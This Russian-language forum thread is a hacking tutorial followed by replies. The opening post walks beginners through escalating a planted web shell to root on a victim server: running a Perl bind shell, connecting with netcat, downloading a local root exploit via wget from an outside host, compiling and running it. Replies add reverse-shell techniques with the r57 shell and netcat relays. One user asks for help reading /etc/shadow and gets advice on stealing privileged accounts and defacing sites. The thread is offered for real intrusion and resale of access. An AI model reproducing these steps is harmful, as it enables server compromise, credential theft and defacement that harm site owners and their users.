[intro] Сразу хочy сказать что эта статья для новичков, для тех кто раньше никогда с этим не сталкивался. Все скрипты и программы которые нам пригодятся [Начало] Многие после заливки шелла не знают что делать с ним, некоторые их продают по-дешовке, не зная того что можно было бы получить рут и продать его еще дороже =))) Собственно мы сейчас будем рассматривать как получить рут =) И так поехали =) [Работаем с шеллом] Вот мы нашли уязвимый сайтик, воспользовались багой, попали в админку и залили шелл =) Переходим в директорию /tmp. Теперь нам нужно залить бинд шелл для того что бы открыть порт 32767 на сервере который в дальнейшем сыграет большую роль. Так, заливаем bind_port.pl в директорию /tmp (естественно если нам позволяют права). После того как залили блинд шелл, его надо запустить следующей командой: Код: perl bind_port.pl Запустили, открылся порт =) Теперь нужно запустить программку netcat. Прописываем в ней адрес сайта, порт (нажимаем "Enter"), пример: Код: site.com 32762 Сделали. Далее выполняем команду: Код: ls -al Появляется список файлов в нашей директории /tmp [Заливка и компиляция скрипта] Прописываем в netcat следующeе: Код: wget http://vbs29.narod.ru/lam.c Ждем пару секунд пока загрузится. Когда загрузилось компилируем следующей командой: Код: gcc lam lam.c -static После того как скомпилировали, запускаем командой: Код: ./lam Выполняем команду id и видим: Код: uid=0|root| gid=0|root| Поздравляю ))) Теперь у вас есть права root на сервере ))) (c)whack.ru (c)YO$YA зы. Позволил себе подкорректировать орфографические ошибки ибо читать противно (с)hookman
Hookman, утилита wget стоит не на каждом сервере - ее ставят руками =\ Врядли умный админ поставит на боевой сервак ненужную утилиту, которая только память занимает, ибо никому на реальном сервере не разрешат что-то качать с инета - занимать канал и ресурсы.
Совсем нет. Подумай еще) Подняв рута, первое, получаешь доступ ко ВСЕМ сайтам на сервере, второе, получаешь доступ к контенту. А тут можно неплохо поднимать и в другом плане лаве, если с умом. По моему "бинд") При том что на любом практически серваке, будет стоять фаер и *** он тебе даст подрубиться к себе удаленно. Тут делается бэкконнект, чтобы фаер не палил. Смысл лить какие-то скрипты левые на перле, берешь обычный р57 или любой другой норм шелл и делаешь бэкконнект или там биндпорт. Хоть раз делал подобное? Неткат ставиться у себя на машине, и в нем прописывается "-l -n -v -p 3373", потом берется обыкновенный р57, лучше поновее (1.4) и открывается бэкконнект на свою тачку, на прописанный в неткате порт... И ты получаешь доступ к ссх удаленно, с правами нобади, как правило. Компилятся сплоиты, при том далеко не все работают подобным образом, нужно сперва инструкцию почтитать, хотя большинство работают именно так, просто сливая права рута на нобади))) Конечно можно не делать прямой коннект себе на тачку, согласитесь глупо, а залить неткат на левый сервер, скомпилировать, и через него уже делать бэкконнект к себе с целевого сервера.
http://ahack.ru/download.php?file=f3fb38800cde9eb688a43b88d42a8abe Ссылка не рабочая - перезалейте на файлообменник.
ребята подскажите. Если у меня есть доступ к фтп, но я могу заливать файлы только в директории типа image с правами 777, а права 755 и ниже мне уже не доступны, то есть я могу скачивать файлы но не могу их заливать на сервер. Я пробывал ставить шел, но я не могу с помощью него прочитать файл shadow, пишет то не хватает прав. Подскажите что можно сделать чтобы я мог заливать файлы на сервер через фтп или Http или еще как. На сервер стоит Линукс, php4 и какой-то мускул(он меня не интересует). Если можно поподробнее. Заранее Благодарен!
Есть шелы которые имеют функцию смены прав на папки и файлы но работает она очень редко. Ты попросту ограничен в правах, поэтому попытайся имея этот аккаунт украсть акк с более выгодными привилегиями. На мой взгляд альтернативного варианта назначения прав нет. В этом тебе как раз может помочь тот же MySQL. Если админ ***(профан в сетевой безопасности) то порой там пассы в открытом виде можно найти.
Быть может варианты всё же есть. Я могу ошибаться, но какую цель ты преследуешь? Если дефейс и там стоит CMS то тебе достаточна получить доступ до админки сайта. В этом тебе поможет снова таже самая БД